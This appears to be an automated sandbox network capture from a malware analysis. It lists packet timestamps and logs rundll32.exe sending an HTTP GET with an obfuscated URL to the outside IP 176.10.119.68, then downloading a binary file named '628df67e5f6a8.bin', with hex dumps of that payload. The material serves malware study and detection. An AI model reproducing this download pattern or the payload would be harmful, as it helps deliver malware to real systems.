                        May 25, 2022 11:27:27.345349073 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.345366001 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.345438004 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.345510006 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346698046 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346730947 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346755028 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346777916 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346795082 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346807957 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346816063 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346836090 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346839905 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346863985 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346888065 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346889019 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346894026 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346910000 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346926928 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.346934080 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346937895 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.346965075 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.348109007 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.348145008 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.348167896 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.348184109 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.348210096 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.348242044 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350125074 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350157022 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350179911 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350200891 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350215912 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350236893 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350258112 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350263119 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350275993 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350280046 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350282907 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350305080 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350310087 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350336075 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350358963 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350359917 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350364923 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350377083 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.350403070 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.350406885 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.353005886 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353033066 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353053093 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353074074 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353087902 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353118896 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.353135109 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.353837967 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353864908 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353885889 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353905916 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353924990 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.353950024 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.353957891 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.354001999 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.354005098 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.354027987 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.354042053 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.354085922 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355632067 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355663061 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355688095 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355710983 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355732918 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355742931 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355758905 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355784893 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355789900 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355794907 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355803013 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355818987 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355829000 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355854034 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355878115 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355880022 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355885029 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355902910 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355922937 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355927944 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355928898 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355954885 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355978012 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.355978966 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.355983973 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356004953 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356021881 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356040955 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356044054 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356056929 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356066942 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356089115 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356103897 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356110096 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356117010 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356132984 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356152058 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356167078 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356169939 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356173038 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356178045 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356192112 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356205940 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356209040 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356231928 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356245995 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356251955 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356256008 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356278896 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356298923 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356314898 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356333971 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356336117 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356340885 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356353045 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356374025 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356389046 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356394053 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356395960 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356398106 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356416941 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356437922 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356446028 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356451988 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356460094 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356488943 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356493950 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356502056 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356503010 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356525898 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356540918 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356559992 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356581926 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356604099 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356611967 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356616020 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356626034 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356648922 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356653929 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356657028 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356672049 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356693029 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356693983 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356697083 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356718063 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356739044 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356753111 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.356782913 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356787920 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.356791019 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.357369900 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.357399940 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.357431889 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.357453108 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.357475042 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.357496023 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.357505083 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.357518911 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.357542992 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.357558966 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.357559919 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.357563972 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.357567072 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.357588053 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.360047102 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.360075951 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.360094070 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.360229015 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.363274097 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.363343000 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.363362074 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.363379955 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.363399982 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.363425016 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.363450050 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.363473892 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.363481998 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.363492012 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.363497019 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.363516092 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:27.363547087 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.363554001 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:27.363888025 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:28.182548046 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:27:28.200694084 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:28.475930929 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:28.475972891 CEST8049771176.10.119.68192.168.2.4
                        May 25, 2022 11:27:28.476161957 CEST4977180192.168.2.4176.10.119.68
                        May 25, 2022 11:28:32.470417976 CEST4977180192.168.2.4176.10.119.68

                        HTTP Request Dependency Graph

                        • 176.10.119.68

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.449771176.10.119.6880C:\Windows\SysWOW64\rundll32.exe
                        TimestampkBytes transferredDirectionData
                        May 25, 2022 11:27:26.119944096 CEST1245OUTGET /drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZd85/z64fb0RLSddtHF/rHMZD1_2FqMPdbWOBNRMe/v9EppSM4NhIsm8SQ/XAUtOy4sCW68iNX/Cmaw_2Ff5hh5_2FyXv/eA_2Fri4K/swu3zwi7P_2FcYbL_2Bx/W02PomqcfEjRbitbvf6/IXpVMOx_2BSCAzr10HE5Rp/jnPQORhN2og07/6kVbs5lO/NwTvbwc1Won8BiTcK1YZBEd/L7l.jlk HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 176.10.119.68
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        May 25, 2022 11:27:26.411830902 CEST1246INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 25 May 2022 09:27:26 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 186012
                        Connection: keep-alive
                        Pragma: public
                        Accept-Ranges: bytes
                        Expires: 0
                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                        Content-Disposition: inline; filename="628df67e5f6a8.bin"
                        Data Raw: ea bd a2 1d 3e 3e d3 c3 36 c2 dd da f9 57 fc d3 3c f1 a8 93 93 9a cc 6b a2 b4 af 06 ab bc f8 6a 05 ce f7 96 f1 3f 92 c2 32 8e e8 dd cd 51 6d 66 73 db 65 23 2e 01 e2 ab d1 c0 2c 7a 98 76 f4 7c db 33 4f 47 9b 24 97 a1 68 86 78 b3 18 9a e0 58 ba 3a d9 a0 b3 e4 ed a3 a1 37 7e ad d4 3c 43 bd bd 87 f8 df 34 f6 66 6e 90 b2 b3 64 aa ab b2 74 71 82 14 a2 e0 67 25 ba bc cb d1 3c e7 39 fb 54 34 9e 24 19 e7 ae ea 73 93 a9 86 2a ed 26 2d c4 d8 05 31 6d a8 65 d4 e4 c6 08 11 b1 eb 4a 99 c7 4e 4b 51 cb 0c 94 14 90 e3 13 f2 a6 e1 0c 74 e7 a5 b7 7c 48 e6 da 7c 05 c4 bd fc cf a6 d8 ec 60 7a 35 23 aa 05 1c 1b 74 8b ac 40 9d 74 56 c8 13 e3 0e e1 23 1d 6a 7b 45 35 a8 08 41 72 20 62 65 70 03 a8 6d 19 d3 e8 78 ab eb 3c 90 9b de a0 93 90 e3 6d 51 e1 fb 4c 46 cd 28 aa 05 03 69 5e eb b1 b9 c8 69 c0 bb 3d ff 38 7a 5f bc bb 7b ce d2 d2 17 06 07 55 8b b1 51 3f 7e f3 df 05 d8 b0 ad da 1b 94 75 a1 b9 63 1d d1 a5 16 14 b5 59 f9 52 f0 ec 28 a9 53 6d bd 23 5b db 85 59 a8 d3 a6 76 98 0e b0 1d 57 8f 69 0e 87 bc 26 00 84 a4 5f 83 c3 4d 38 9e 3a 11 60 12 9c a3 7c 11 3c 36 d2 1d 29 c0 ef 89 ca 90 c9 b5 98 74 eb e9 ff e9 e4 c0 a3 7c 74 59 de 3a b3 bc 0c 13 48 ea 7e 08 80 f1 aa 94 73 9d 49 f5 87 4f 36 bf 42 b5 9a 68 36 fb 2b e5 d1 33 bf f9 d9 36 0c c6 bf 84 a3 48 a2 02 df a9 25 3c 25 d0 9d 0a 6e 11 84 24 91 8f b9 3a 9e f6 24 9f ce 71 b7 f8 84 87 81 91 78 fa 70 5e 73 8e de 97 9d 54 ba 72 b6 da b9 fe 3c bf d5 cd 31 eb 9b b2 5f dd 67 84 2a 13 f5 21 c7 67 df 1d 8a 41 7a 1e cf f5 4c 54 89 a0 b3 c4 af b5 e2 a9 ae 0a 94 e8 7a 92 4d d7 44 b9 87 dd 6b 5e ae eb ca 1a f8 a6 78 89 03 a1 61 8b 01 f0 80 89 5e 03 2d ed 92 a1 93 17 ed 95 5e c5 ff 84 0e 82 ae 1b 4b ee b3 75 3e 26 3e 2b be 39 29 6d 2d e7 92 a3 f9 f6 07 02 6f 9b 8e 36 73 69 15 fc e4 93 2e 07 a6 f4 96 76 61 96 9d 31 e9 17 40 2d 2c 9e da c5 f8 c0 06 63 7b a1 f1 fd c7 b7 90 a0 66 8a 89 3f 05 83 f4 a7 11 a1 6c ee f2 fd b0 2a 61 4a 6d ac 4f c7 c5 83 96 04 38 6f 1f c0 f4 d6 9c 43 9b a6 f8 98 98 41 56 a7 bf 62 e4 8f 4c 8f d9 33 89 de df bd 1c e7 75 47 56 fb 6e a7 c6 4e 41 11 45 91 45 9c 65 42 50 9a 50 b0 89 91 5d 9a 3d 6d 94 24 21 b0 23 c5 42 d0 ec 3c 73 12 1c 4b 77 16 c7 e6 fb ae 2f 99 5b 98 41 9a 0f 93 47 20 d3 c0 cc a1 26 fa 0e 0a 55 41 b3 00 55 8d b0 fb a9 ef 8e 6d fc 70 9c 26 04 b7 c0 45 b3 e4 43 94 bd 47 2b 41 4c 72 40 35 3f d8 2a e2 da 64 9e 70 d3 a6 c5 99 4b b8 78 f8 e3 7e 09 0a e3 ac 02 de 72 1a 94 51 8c e9 23 b6 74 72 b4 59 ea 6a 95 b8 25 0f 92 0c f5 f0 1d c3 72 c4 bc 33 0c d5 af b5 03 c6 b8 d8 a0 1a 3c d4 75 f1 c8 d6 e0 1b 85 fc bb 5d e9 65 13 f9 72 fb 1c f8 5b 14 d6 b2 f2 2b 3c d3 49 23 64 ba 0a 35 c6 7b 57 37 0b da 94 27 53 89 b4 b4 b0 49 f5 9a d8 d8 06 8e ab c0 c6 2d 0d f3 78 8b 28 66 b4 85 bc 35 14 e2 1c b9 46 20 81 05 1a ec 2d 7a 88 2e 6b 02 7e 9f 13 35 e8 fe 19 8f b0 5d 05 9b f2 e5 bb 53 fd 75 f0 f7 89 f7 c2 f5 19 e2 00 51 d5 a1 42 19 73 0f ff 48 80 f3 4d 01 ab 61 12 fb 06 1f 4e 65 4a 3c 07 ec 30 1c a5 bf c3 12 a8 0d c6 69 cc c0 4e 44 84 8c 1c 77 31 25 9f 83 8a 18 4a d3 e3 fc c3 e6 79 21 67 3e 95 66 d4 97 b2 65 64
                        Data Ascii: >>6W<kj?2Qmfse#.,zv|3OG$hxX:7~<C4fndtqg%<9T4$s*&-1meJNKQt|H|`z5#t@tV#j{E5Ar bepmx<mQLF(i^i=8z_{UQ?~ucYR(Sm#[YvWi&_M8:`|<6)t|tY:H~sIO6Bh6+36H%<%n$:$qxp^sTr<1_g*!gAzLTzMDk^xa^-^Ku>&>+9)m-o6si.va1@-,c{f?l*aJmO8oCAVbL3uGVnNAEEeBPP]=m$!#B<sKw/[AG &UAUmp&ECG+ALr@5?*dpKx~rQ#trYj%r3<u]er[+<I#d5{W7'SI-x(f5F -z.k~5]SuQBsHMaNeJ<0iNDw1%Jy!g>fed
                        May 25, 2022 11:27:26.411885023 CEST1247INData Raw: 3b 71 e0 49 53 4e 7c ba cb 3a a1 08 b2 64 48 5c c5 61 9d 5b 9f 3d b2 01 89 e8 1c 80 5b 82 e2 bb 9d af 0d 2b 80 c6 54 dd 97 e7 a2 39 7c 56 42 ec 15 ad 74 c0 26 63 68 fe bd d7 5e d4 37 99 63 c5 d7 95 6c e2 c6 61 04 41 10 03 22 69 df ad 41 8b 03 91
                        Data Ascii: ;qISN|:dH\a[=[+T9|VBt&ch^7claA"iA?8PXON?cx@XU7Kv{31/\1/))6zr3;lXaoZQzb1(xF-N3Y=|]!{)<chq^!nfU<SIOWUr0T#P<Z3V>]
                        May 25, 2022 11:27:26.412241936 CEST1249INData Raw: fb 64 d4 80 13 bf 23 ac 9d 09 91 17 de 02 1d bc 7c d5 48 7c cc 7b 81 ed eb 85 40 b2 94 dc fc d1 07 a5 f5 bb 4d f0 1b 35 b1 cb 1e dc d1 a5 fe 32 64 1e f8 8d c6 2b fd 03 b4 09 fc ed 84 fa 70 1a 0f 61 62 d7 c4 5f f0 97 30 64 bc 91 0f d2 71 f9 1c 87
                        Data Ascii: d#|H|{@M52d+pab_0dq/d+/w` S~vVvm;:o:.\_*~\)u75O:q})_p*E;=`Xsk{\^
                        May 25, 2022 11:27:26.412262917 CEST1250INData Raw: df 1b c7 d9 4f d6 de 2b 74 4a 6d 5d a5 00 dd 23 ac 94 5d c2 41 2d 49 58 78 54 98 06 a1 3a 36 17 8b 5d 7c 02 c5 68 df f8 c7 42 37 de f6 14 01 b6 10 cd 53 45 92 df 32 ba 20 a5 10 ee 7f 13 e1 60 ca ad 53 1f a7 b0 97 51 91 45 e3 66 92 77 9e 50 d6 f1
                        Data Ascii: O+tJm]#]A-IXxT:6]|hB7SE2 `SQEfwP&7a$hG>O@:.rU9b4u(0j8fJJ^|-Z%f[H|'$_#.'6j5y4Ut62rv%lHF0lW@
                        May 25, 2022 11:27:26.412427902 CEST1252INData Raw: 64 09 ca 53 d9 c4 0e ec f7 05 3c 71 43 d5 15 2c 2a 35 74 f8 72 cf e5 03 5c bf cb d5 e4 39 28 a8 2c 13 dc 10 c5 0a 48 8d 52 91 cf 74 28 c9 3b 12 fd 51 bb 03 09 f7 c0 c9 dd d7 71 b1 1d 5e b8 22 f3 cf 91 38 e9 a6 ea c4 e3 5c e3 ee c9 01 1b 2d da e1
                        Data Ascii: dS<qC,*5tr\9(,HRt(;Qq^"8\-U20jX;,w_OqPmU<7]1n0;LAw;#+Os|-xT`C,;Rnk<%m|r>O$fN%?w5c
                        May 25, 2022 11:27:26.412446022 CEST1253INData Raw: 28 ef 65 70 ce e9 bb fa b0 ed cc 15 cf 2a 4c 8d 01 1f 96 1b 80 02 d9 88 fa 88 f1 01 a7 9e 2c 6c 8e e8 c2 84 6b 00 48 b0 b5 81 c4 7d f6 4c f6 79 83 97 81 88 cc 0b 97 34 dd 71 96 e6 4d 23 b8 5e 6a 15 e9 76 2f a0 09 3e c5 2c 27 fa bd b6 2f dd 2c 04
                        Data Ascii: (ep*L,lkH}Ly4qM#^jv/>,'/,b9TIYrOzLN0*H^#xJ]0LgDAh@@-km8HUk_HK=%#w-b|^:rDg'$0n_p5KPUYYF$(Np
                        May 25, 2022 11:27:26.412524939 CEST1254INData Raw: 4c 88 4d e6 74 a2 c9 71 8e 72 92 fb 93 91 5c 7c e9 62 31 ee 26 86 6b 90 4c 25 8f 8a f8 67 9e 02 3f 8c 11 f8 86 fd 45 c9 a4 3d d8 c9 5e 92 21 37 f0 d3 9f fe 27 72 bc de bc ea 8d a4 1d fb f4 f9 29 85 86 6b 20 7e 5e 25 f1 ea d9 a4 4d fa a6 88 d6 1f
                        Data Ascii: LMtqr\|b1&kL%g?E=^!7'r)k ~^%ML&B*blBTfg@^`)%_KVJR$bG|9zVo4/Ld=Y>!89>M(
                        May 25, 2022 11:27:26.412811995 CEST1255INData Raw: eb 3a 24 24 36 ca c4 75 fb e4 68 8c 2e d3 0b a5 cc 37 34 2d 8b 27 da f8 97 de 64 79 45 9e 3c 80 f0 76 82 e0 46 8d e4 a7 ba 8e ed 3b 53 5b c1 1a 39 06 2d ad ca 9c e8 2f 15 33 48 06 59 80 c6 61 ae 0b 76 a9 12 99 91 75 59 91 dc 0a fa d5 19 b6 e1 9a
                        Data Ascii: :$$6uh.74-'dyE<vF;S[9-/3HYavuY#Ds!X+hd-.2j[AkKzAhdl!>Ybe2^{~s~%9h%G?faO2=Zx|*dPiA%N!L|T62"K1QM#
                        May 25, 2022 11:27:26.412832022 CEST1256INData Raw: 6d d8 45 7c 7b 5b b5 28 92 08 60 9e 79 28 1c 20 83 e8 7a 1f 54 49 cf 81 c5 0b c5 87 83 72 57 6e d2 f2 86 90 75 71 0d b7 52 c5 eb 4d ae 67 65 f7 84 ef 98 ae e2 e9 45 33 f9 0e c4 91 aa d9 19 0d 19 89 e4 08 cb ca f9 5f f2 43 65 59 d9 e5 34 da d7 72
                        Data Ascii: mE|{[(`y( zTIrWnuqRMgeE3_CeY4rz|Qo[aW~QUb\5&'j%PPKryq6aoMZb4|ptoZ]E+?nMjC1yc`|xt!mv_
                        May 25, 2022 11:27:26.412903070 CEST1258INData Raw: 44 ef e1 56 15 16 d7 41 97 35 bd a6 73 a4 11 c2 bc 99 4a e6 73 c8 b1 51 97 a5 3d b6 04 d6 e5 d0 06 09 69 94 78 2b d4 d3 a4 24 73 dd 9c 45 3a 19 7a 34 32 12 fe 71 8c cd 65 86 1b 69 3a c8 1f 34 27 dd dd 16 6e 66 46 fb d0 c0 9a 26 af 8f b4 06 2c e5
                        Data Ascii: DVA5sJsQ=ix+$sE:z42qei:4'nfF&,>$eq}]_9\PoqnFi/d.U*7%(>puE:%Ak\Ep!%i?Ss5UicM(-1oRNin[`Sal
                        May 25, 2022 11:27:26.431308031 CEST1259INData Raw: 12 8a 55 51 74 82 c0 b0 4b 66 cf d6 53 f1 a2 e8 63 67 49 59 4d cd 4c 0a c5 85 c3 78 59 6a 61 ce c6 4c c7 7e 51 11 c7 c8 67 04 e2 7f a6 59 6f f4 de 9e 2a b6 a7 ee 67 59 e5 b5 97 bc 0d 8f ad fc b0 b0 60 b7 c3 fd 4c b5 2b d6 3f 98 33 87 dd 67 96 9e
                        Data Ascii: UQtKfScgIYMLxYjaL~QgYo*gY`L+?3gFoZ!X*KKW6L.Hz)YpL:XDRhHXnm2<tK^*X&/6>|k<d;IzLalar?]_AKQ B*
